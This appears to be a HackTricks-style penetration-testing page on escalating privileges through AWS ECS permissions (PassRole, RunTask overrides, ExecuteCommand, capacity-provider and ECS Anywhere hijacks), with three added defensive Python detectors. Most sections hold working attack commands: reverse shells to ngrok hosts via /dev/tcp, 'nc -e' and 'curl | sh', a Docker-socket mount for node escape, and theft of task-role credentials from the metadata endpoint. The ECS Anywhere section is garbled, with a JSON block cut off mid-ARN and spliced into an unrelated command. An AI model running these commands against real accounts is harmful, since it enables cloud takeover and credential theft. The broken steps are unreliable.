# AWS - ECS Privesc
## ECS

More information about ECS can be found in:
### iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials and run it.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```

**Potential Impact:** Direct privesc to a different ECS role.
### iam:PassRole, ecs:RunTask

An attacker with the iam:PassRole and ecs:RunTask permissions can launch a new ECS task and override the execution role, task role and container command values. The `ecs run-task` CLI command has a `--overrides` flag that allows overriding executionRoleArn, taskRoleArn and the container command at runtime without modifying the task definition.

The IAM roles specified in taskRoleArn and executionRoleArn must be assumable by ecs-tasks.amazonaws.com in their trust policy.

Additionally, the attacker needs to know:

- The ECS cluster name
- The VPC subnet
- The security group (if no security group is specified, the default one is used)
- The Task Definition name and revision
- The container name

```bash
aws ecs run-task \
  --cluster <cluster-name> \
  --launch-type FARGATE \
  --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
  --task-definition <task-definition:revision> \
  --overrides '
{
  "taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
  "containerOverrides": [
    {
      "name": "<container-name>",
      "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
    }
  ]
}'
```

In the snippet above the attacker only overrides the taskRoleArn value. However, for the attack to work the attacker must have iam:PassRole permission over both the taskRoleArn specified in the command and the executionRoleArn specified in the task definition.

If the IAM role the attacker can pass has enough privileges to pull the ECR image and start the ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer, ecr:BatchGetImage, ecr:GetAuthorizationToken), the attacker can use that same IAM role for both executionRoleArn and taskRoleArn in the `ecs run-task` command.

```bash
aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
  "taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
  "executionRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
  "containerOverrides": [
    {
      "name": "<container-name>",
      "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
    }
  ]
}'
```

**Potential Impact:** Direct privesc to any ECS task role.
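Both abuse paths above leave distinctive fields in CloudTrail: a RegisterTaskDefinition call that carries a taskRoleArn together with a shell-style command, and a RunTask/StartTask call whose `overrides` swaps the task or execution role or replaces the container command. The following Python is an added example for this page, not HackTricks' code: it classifies CloudTrail-shaped events by exactly those fields. The event shapes, account IDs, ARNs, the ngrok-style hostname reused from the page, and the command regex are all assumptions made for the example; the same classifier applies to the StartTask, CreateService and UpdateService variants described in the sections that follow, since CloudTrail records their requestParameters the same way.

```python
"""Classify ECS CloudTrail events that match the PassRole/RunTask and
RegisterTaskDefinition abuse patterns. Added example; not HackTricks' code."""
import json
import re

# Constructed sample events. The field layout (eventName, userIdentity.arn,
# requestParameters) follows CloudTrail; every value below is made up.
SAMPLE_EVENTS = [
    {   # task definition that carries a role and a reverse-shell command
        "eventName": "RegisterTaskDefinition",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
        "requestParameters": {
            "family": "iam_exfiltration",
            "taskRoleArn": "arn:aws:iam::111122223333:role/ecsTaskExecutionRole",
            "containerDefinitions": [{
                "name": "exfil_creds", "image": "python:latest",
                "entryPoint": ["sh", "-c"],
                "command": ["/bin/bash -c \"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\""],
            }],
        },
    },
    {   # RunTask that swaps the task role and the command at runtime
        "eventName": "RunTask",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
        "requestParameters": {
            "taskDefinition": "web:7",
            "overrides": {
                "taskRoleArn": "arn:aws:iam::111122223333:role/HighPrivilegedECSTaskRole",
                "containerOverrides": [{"name": "web",
                                        "command": ["nc", "203.0.113.10", "18798", "-e", "/bin/bash"]}],
            },
        },
    },
    {   # ordinary deployment: no overrides, nothing to flag
        "eventName": "RunTask",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ci-deployer"},
        "requestParameters": {"taskDefinition": "web:7"},
    },
]

# Shell fragments that rarely belong in a legitimate container command
# (assumed indicator list; tune it for your environment).
SUSPICIOUS_CMD = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\|\s*(ba)?sh\b|bash -i", re.I)


def _commands(params):
    """Yield every command string from container definitions and overrides."""
    for cd in params.get("containerDefinitions", []):
        yield " ".join(cd.get("command", []))
    for co in (params.get("overrides") or {}).get("containerOverrides", []):
        yield " ".join(co.get("command", []))


def classify_event(event):
    """Return the list of finding tags for one event ([] when nothing matches)."""
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    findings = []
    if name == "RegisterTaskDefinition" and params.get("taskRoleArn"):
        findings.append("taskdef-with-role")
    if name in ("RunTask", "StartTask"):
        ov = params.get("overrides") or {}
        if "taskRoleArn" in ov or "executionRoleArn" in ov:
            findings.append("role-override")        # role swapped at runtime
        if any(co.get("command") for co in ov.get("containerOverrides", [])):
            findings.append("command-override")     # command replaced at runtime
    if any(SUSPICIOUS_CMD.search(c) for c in _commands(params)):
        findings.append("suspicious-command")
    return findings


def scan(events):
    """Group findings by calling principal: {arn: [(eventName, tags), ...]}."""
    report = {}
    for ev in events:
        tags = classify_event(ev)
        if tags:
            report.setdefault(ev["userIdentity"]["arn"], []).append((ev["eventName"], tags))
    return report


if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
```

A `role-override` on its own is worth an alert only when the overriding role differs from the one in the registered task definition; comparing against `describe-task-definition` output is the natural next step, and the `taskdef-with-role` tag is mainly useful combined with `suspicious-command` or with a principal that does not normally deploy.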
### iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials and run it.
However, in this case a container instance needs to exist to run the malicious task definition on.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
  --container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```

**Potential Impact:** Direct privesc to any ECS role.
### iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

Just like in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials and run it by creating a new service with at least 1 task running.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn "$ECS_ROLE_ARN" \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
  --task-definition iam_exfiltration \
  --desired-count 1 \
  --cluster "$CLUSTER_ARN" \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
  --service <SERVICE NAME> \
  --task-definition <NEW TASK DEFINITION NAME>
```

**Potential Impact:** Direct privesc to any ECS role.
### iam:PassRole, (ecs:UpdateService|ecs:CreateService)

Actually, with just those permissions it's possible to use overrides to execute arbitrary commands in a container with any role, with something like:

```bash
aws ecs run-task \
  --task-definition "<task-name>" \
  --overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
  --cluster <cluster-name> \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
```

**Potential Impact:** Direct privesc to any ECS role.
### ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

This scenario is like the previous ones but without the iam:PassRole permission.

This is still interesting because if you can run an arbitrary container, even without a role, you could run a privileged container to escape to the node and steal the EC2 IAM role and the roles of the other ECS containers running on the node.

You could even force other tasks to run inside the EC2 instance you compromised in order to steal their credentials (as discussed in the Privesc to node section).

> [!WARNING]
> This attack is only possible if the ECS cluster is using EC2 instances and not Fargate.

```bash
printf '[
    {
        "name":"exfil_creds",
        "image":"python:latest",
        "entryPoint":["sh", "-c"],
        "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
        "mountPoints": [
            {
                "readOnly": false,
                "containerPath": "/var/run/docker.sock",
                "sourceVolume": "docker-socket"
            }
        ]
    }
]' > /tmp/task.json

printf '[
    {
        "name": "docker-socket",
        "host": {
            "sourcePath": "/var/run/docker.sock"
        }
    }
]' > /tmp/volumes.json

aws ecs register-task-definition --family iam_exfiltration \
  --cpu 256 --memory 512 \
  --requires-compatibilities '["EC2"]' \
  --container-definitions file:///tmp/task.json \
  --volumes file:///tmp/volumes.json

aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
  --launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
```
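The task definition above mounts the node's Docker socket into the container, which is the primitive that turns "can run any container" into "owns the node" on EC2-backed clusters. The following Python is an added example for this page, not HackTricks' code: it audits task definitions (in the shape `aws ecs describe-task-definition` returns) for host bind mounts of sensitive paths, privileged containers, host PID/network namespaces and dangerous added capabilities. The sensitive-path list, the capability list and the two sample task definitions are assumptions made for the example; the first sample mirrors the /tmp/task.json and /tmp/volumes.json above.

```python
"""Audit ECS task definitions for container-to-node escape primitives.
Added example for this page; not HackTricks' code."""
import json

# Host paths that hand a container control of the node or of its other
# containers (assumed list; extend for your environment).
SENSITIVE_HOST_PATHS = (
    "/var/run/docker.sock", "/run/docker.sock", "/var/run/containerd",
    "/var/lib/docker", "/etc", "/root", "/proc", "/sys",
)
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}

# Constructed input: the page's task.json + volumes.json combined into one task
# definition object, plus a benign one for contrast.
ESCAPE_TASKDEF = {
    "family": "iam_exfiltration",
    "requiresCompatibilities": ["EC2"],
    "containerDefinitions": [{
        "name": "exfil_creds",
        "image": "python:latest",
        "entryPoint": ["sh", "-c"],
        "command": ["/bin/bash -c \"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\""],
        "mountPoints": [{"readOnly": False, "containerPath": "/var/run/docker.sock",
                         "sourceVolume": "docker-socket"}],
    }],
    "volumes": [{"name": "docker-socket", "host": {"sourcePath": "/var/run/docker.sock"}}],
}
BENIGN_TASKDEF = {
    "family": "web",
    "containerDefinitions": [{
        "name": "web", "image": "nginx:1.25",
        "mountPoints": [{"readOnly": True, "containerPath": "/data", "sourceVolume": "app-data"}],
    }],
    "volumes": [{"name": "app-data", "host": {"sourcePath": "/srv/app-data"}}],
}


def is_sensitive_host_path(path):
    """True for '/' and for anything at or below an entry of SENSITIVE_HOST_PATHS."""
    p = path.rstrip("/") or "/"
    if p == "/":
        return True
    return any(p == s or p.startswith(s + "/") for s in SENSITIVE_HOST_PATHS)


def host_volumes(taskdef):
    """Map volume name -> host sourcePath for bind-mount ('host') volumes only."""
    out = {}
    for vol in taskdef.get("volumes", []):
        host = vol.get("host") or {}
        if host.get("sourcePath"):
            out[vol["name"]] = host["sourcePath"]
    return out


def audit_task_definition(taskdef):
    """Return (container, finding) pairs; an empty list means nothing risky found."""
    findings = []
    if taskdef.get("pidMode") == "host":
        findings.append(("*", "pidMode=host"))
    if taskdef.get("networkMode") == "host":
        findings.append(("*", "networkMode=host"))
    vols = host_volumes(taskdef)
    for cd in taskdef.get("containerDefinitions", []):
        name = cd.get("name", "?")
        if cd.get("privileged"):
            findings.append((name, "privileged=true"))
        caps = ((cd.get("linuxParameters") or {}).get("capabilities") or {}).get("add") or []
        for cap in caps:
            if cap in DANGEROUS_CAPS:
                findings.append((name, "cap_add=" + cap))
        for mp in cd.get("mountPoints", []):
            src = vols.get(mp.get("sourceVolume"))
            if src and is_sensitive_host_path(src):
                mode = "ro" if mp.get("readOnly") else "rw"
                findings.append((name, f"host mount {src} -> {mp.get('containerPath')} ({mode})"))
    return findings


def audit_all(taskdefs):
    """family -> findings, listing only task definitions with at least one finding."""
    report = {}
    for td in taskdefs:
        found = audit_task_definition(td)
        if found:
            report[td.get("family", "?")] = found
    return report


if __name__ == "__main__":
    print(json.dumps(audit_all([ESCAPE_TASKDEF, BENIGN_TASKDEF]), indent=2))
```

Running this over every active revision (`list-task-definitions` followed by `describe-task-definition`) gives an inventory of the escape primitives a RegisterTaskDefinition-only principal could already reach; the same checks can be enforced at registration time with an IAM Condition or a CI policy gate.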
### ecs:ExecuteCommand, ecs:DescribeTasks, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to it (the describe permissions are needed because `aws ecs execute-command` requires them).

However, in order to do that, the container instance needs to be running the ExecuteCommand agent (which by default isn't).

Therefore, the attacker could try to:

- Try to run a command in every running container

```bash
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
    echo "Cluster $cluster"
    for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
        echo "  Task $task"
        # If true, it's your lucky day
        aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
    done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
  --command "sh" \
  --cluster "$CLUSTER_ARN" \
  --task "$TASK_ARN"
```

Once you have a shell inside the container, you can usually extract the task role credentials from the task credentials endpoint and reuse them outside the container:

```bash
# Inside the container:
echo "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | jq

# If you want to use them locally, print shell exports:
python3 - <<'PY'
import json, os, urllib.request
u = "http://169.254.170.2" + os.environ["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
d = json.load(urllib.request.urlopen(u, timeout=2))
print("export AWS_ACCESS_KEY_ID=" + d["AccessKeyId"])
print("export AWS_SECRET_ACCESS_KEY=" + d["SecretAccessKey"])
print("export AWS_SESSION_TOKEN=" + d["Token"])
PY
```

- If they have ecs:RunTask, run a task with `aws ecs run-task --enable-execute-command [...]`
- If they have ecs:StartTask, run a task with `aws ecs start-task --enable-execute-command [...]`
- If they have ecs:CreateService, create a service with `aws ecs create-service --enable-execute-command [...]`
- If they have ecs:UpdateService, update a service with `aws ecs update-service --enable-execute-command [...]`

You can find examples of those options in the previous ECS privesc sections.

**Potential Impact:** Privesc to a different role attached to containers.
### ssm:StartSession

Check in the ssm privesc page how you can abuse this permission to privesc to ECS:

### iam:PassRole, ec2:RunInstances

Check in the ec2 privesc page how you can abuse these permissions to privesc to ECS:
### ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole

An attacker with these permissions can often turn "cluster membership" into a security boundary bypass:

- Register an attacker-controlled EC2 instance into the victim ECS cluster (turning it into a container instance)
- Set arbitrary container instance attributes to satisfy placement constraints
- Let ECS schedule tasks onto that host
- Grab the task role credentials (and any secrets/data inside the container) from the task running on your host

Flow summary:

- Get the EC2 instance identity document + signature from an EC2 instance you control in the target account (e.g. via SSM/SSH):

```bash
curl -s http://169.254.169.254/latest/dynamic/instance-identity/document > iidoc.json
curl -s http://169.254.169.254/latest/dynamic/instance-identity/signature > iisig
```

- Register into the target cluster, optionally setting attributes to satisfy placement constraints:

```bash
aws ecs register-container-instance \
  --cluster "$CLUSTER" \
  --instance-identity-document file://iidoc.json \
  --instance-identity-document-signature "$(cat iisig)" \
  --attributes name=labtarget,value=hijack
```

- Verify that it joined:

```bash
aws ecs list-container-instances --cluster "$CLUSTER"
```

- Start a task / update a service so that something gets placed on the instance, then collect the task role creds from inside the task:

```bash
# On the container host:
docker ps
docker exec -it <container-id> sh
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
```

- Registering a container instance with the instance identity document/signature implies that you have access to an EC2 instance in the target account (or have compromised one). For cross-account "bring your own EC2", see the ECS Anywhere technique on this page.
- Placement constraints usually depend on container instance attributes. Enumerate them via ecs:DescribeServices, ecs:DescribeTaskDefinition and ecs:DescribeContainerInstances to learn which attributes you need to set.
### ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

> [!NOTE]
> TODO: Test this

An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions can create a malicious task set for an existing ECS service and update the primary task set. This allows the attacker to execute arbitrary code within the service.

```bash
# Register a task definition with a reverse shell
echo '{
  "family": "malicious-task",
  "containerDefinitions": [
    {
      "name": "malicious-container",
      "image": "alpine",
      "command": [
        "sh",
        "-c",
        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
      ]
    }
  ]
}' > malicious-task-definition.json
aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
```

**Potential Impact:** Execution of arbitrary code in the compromised service, potentially affecting its functionality or exfiltrating sensitive data.
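Every section above reduces to a specific combination of IAM actions, so the cheapest defensive check is to ask which of those combinations a given policy actually grants. The following Python is an added example for this page, not HackTricks' code: it evaluates a policy document against the combinations listed in the sections above, honouring IAM's case-insensitive `*`/`?` action wildcards (so `ecs:*` counts for every ECS action). The combination table and the three sample policies are constructed for the example; Deny statements, NotAction, Resource scoping and Condition keys such as iam:PassedToService are deliberately ignored, so a hit is a candidate to confirm against the full effective policy, not a proven escalation.

```python
"""Map an IAM policy document to the ECS privesc permission combinations
described on this page. Added example; not HackTricks' code. Over-approximates
on purpose: only Allow statements with an Action element are evaluated."""
import fnmatch
import json

_RUNNERS = ("ecs:RunTask", "ecs:StartTask", "ecs:UpdateService", "ecs:CreateService")

# (label, alternatives): a combination is granted if ANY alternative set is fully allowed.
ECS_PRIVESC_COMBOS = [
    ("PassRole+RegisterTaskDefinition+RunTask",
     [{"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:RunTask"}]),
    ("PassRole+RunTask (overrides)",
     [{"iam:PassRole", "ecs:RunTask"}]),
    ("PassRole+RegisterTaskDefinition+StartTask",
     [{"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:StartTask"}]),
    ("PassRole+RegisterTaskDefinition+(Update|Create)Service",
     [{"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:UpdateService"},
      {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:CreateService"}]),
    ("PassRole+(Update|Create)Service",
     [{"iam:PassRole", "ecs:UpdateService"}, {"iam:PassRole", "ecs:CreateService"}]),
    ("RegisterTaskDefinition without PassRole (EC2 node escape)",
     [{"ecs:RegisterTaskDefinition", r} for r in _RUNNERS]),
    ("ExecuteCommand+DescribeTasks+runner",
     [{"ecs:ExecuteCommand", "ecs:DescribeTasks", r} for r in _RUNNERS]),
    ("Register/DeregisterContainerInstance+StartTask+PassRole",
     [{"ecs:RegisterContainerInstance", "ecs:DeregisterContainerInstance",
       "ecs:StartTask", "iam:PassRole"}]),
    ("CreateTaskSet+UpdateServicePrimaryTaskSet+DescribeTaskSets",
     [{"ecs:CreateTaskSet", "ecs:UpdateServicePrimaryTaskSet", "ecs:DescribeTaskSets"}]),
]


def allowed_action_patterns(policy):
    """Collect the Action patterns of every Allow statement (NotAction is ignored)."""
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):
        stmts = [stmts]
    patterns = set()
    for s in stmts:
        if s.get("Effect") != "Allow" or "Action" not in s:
            continue
        acts = s["Action"]
        patterns.update([acts] if isinstance(acts, str) else acts)
    return patterns


def is_allowed(patterns, action):
    """IAM action matching is case-insensitive and supports * and ? wildcards."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def privesc_combos(policy):
    """Return the labels of every combination the policy grants, in table order."""
    patterns = allowed_action_patterns(policy)
    return [label for label, alternatives in ECS_PRIVESC_COMBOS
            if any(all(is_allowed(patterns, a) for a in needed) for needed in alternatives)]


# Constructed sample policies (account ID and role name are made up).
POLICY_ECS_ADMIN = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["ecs:*", "iam:PassRole"], "Resource": "*"}]}
POLICY_READONLY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["ecs:Describe*", "ecs:List*"], "Resource": "*"}]}
POLICY_DEPLOYER = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["ecs:RegisterTaskDefinition", "ecs:UpdateService"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::111122223333:role/app-task-role",
     "Condition": {"StringEquals": {"iam:PassedToService": "ecs-tasks.amazonaws.com"}}}]}


if __name__ == "__main__":
    for name, pol in (("admin", POLICY_ECS_ADMIN), ("readonly", POLICY_READONLY),
                      ("deployer", POLICY_DEPLOYER)):
        print(name, json.dumps(privesc_combos(pol), indent=2))
```

The deployer policy illustrates why the result is a candidate list: it is flagged for three combinations, but its PassRole statement is scoped to one role, so the reachable privilege is bounded by what app-task-role can do rather than "any role". That Resource scoping plus the iam:PassedToService condition is exactly the mitigation the PassRole sections above call for, and it is what a reviewer should verify on each hit.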
### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it with the target cluster, and move the victim service onto this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.

Commands (us-east-1):

- Prerequisites
- Create a Launch Template for the ECS agent to join the target cluster
- Create an Auto Scaling Group
- Create a Capacity Provider from the ASG
- Associate the Capacity Provider with the cluster (optionally as default)
- Move the service to your provider
- Verify that tasks end up on the attacker's instances
- Optional: From the EC2 node, `docker exec` into the target containers and read http://169.254.170.2 to get the task role credentials.
- Cleanup

**Potential Impact:** Attacker-managed EC2 nodes receive the victim's tasks, enabling OS-level access to the containers and theft of task IAM role credentials.

Step-by-step commands (copy/paste)

```bash
export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster

# Instance profile for ECS nodes (trust policy for ec2.amazonaws.com)
aws iam create-role --role-name ht-ecs-instance-role \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' || true
aws iam attach-role-policy --role-name ht-ecs-instance-role \
  --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile \
  --role-name ht-ecs-instance-role || true

VPC=vpc-18e6ac62
SUBNETS=            # subnet IDs (left empty in the source)
AMI=ami-0b570770164588ab4
# base64 of: "#!/bin/bash\necho ECS_CLUSTER=... >> /etc/ecs/ecs.config"
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=              # launch template ID (left empty in the source)
ASG_ARN=            # Auto Scaling Group ARN (left empty in the source)

CP_NAME=htcp-8797
aws ecs create-capacity-provider --name "$CP_NAME" \
  --auto-scaling-group-provider "autoScalingGroupArn=$ASG_ARN,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED"
aws ecs put-cluster-capacity-providers --cluster "$CLUSTER" \
  --capacity-providers "$CP_NAME" \
  --default-capacity-provider-strategy capacityProvider=$CP_NAME,weight=1

SVC=                # target service name (left empty in the source)
# Task definition must be EC2-compatible (not Fargate-only)
aws ecs update-service --cluster "$CLUSTER" --service "$SVC" \
  --capacity-provider-strategy capacityProvider=$CP_NAME,weight=1 \
  --force-new-deployment

TASK=
CI=                 # container instance ARN (left empty in the source)
aws ecs describe-container-instances --cluster "$CLUSTER" --container-instances "$CI" \
  --query 'containerInstances[0].ec2InstanceId' --output text
```
### Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration

Abuse ECS Anywhere to register an attacker-controlled host as an EXTERNAL container instance in the victim's ECS cluster and run tasks on that host using privileged task and execution roles. This gives the attacker OS-level control over where the tasks run (e.g. your own machine) and allows stealing task credentials/data from the tasks and their attached volumes without touching capacity providers or ASGs.

- Required permissions (minimal example):
  - ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
  - ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
  - iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and the task/execution roles)
  - logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
- Impact: Run arbitrary containers with a taskRoleArn of your choosing on an attacker host; exfiltrate task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; gain access to any volumes attached to the tasks; this path is quieter than changing capacity providers/ASGs.

Steps

- Create/find a cluster (us-east-1)

```bash
aws ecs create-cluster --cluster-name ht-ecs-anywhere
```

- Create the ECS Anywhere role and an SSM activation (for the on-prem/EXTERNAL instance)

```bash
aws iam create-role --role-name ecsAnywhereRole \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo "$ACTJSON" | jq -r .ActivationId); ACT_CODE=$(echo "$ACTJSON" | jq -r .ActivationCode)
```

- Provision the attacker host and register it directly as EXTERNAL (example: a small AL2 EC2 instance acting as "on-prem")

user-data.sh:

```bash
#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
```

- Task definition (EXTERNAL launch)

```bash
cat > td-external.json << 'JSON'
{
  "family": "ht-external",
  "requiresCompatibilities": [ "EXTERNAL" ],
  "networkMode": "bridge",
  "memory": "256",
  "cpu": "128",
  "executionRoleArn": "arn:aws:iam::
  --container-instances $CI
```

6) From here you control the host that runs the tasks. You can read the task logs (if awslogs is used) or exec directly on the host to exfiltrate credentials/data from your tasks.
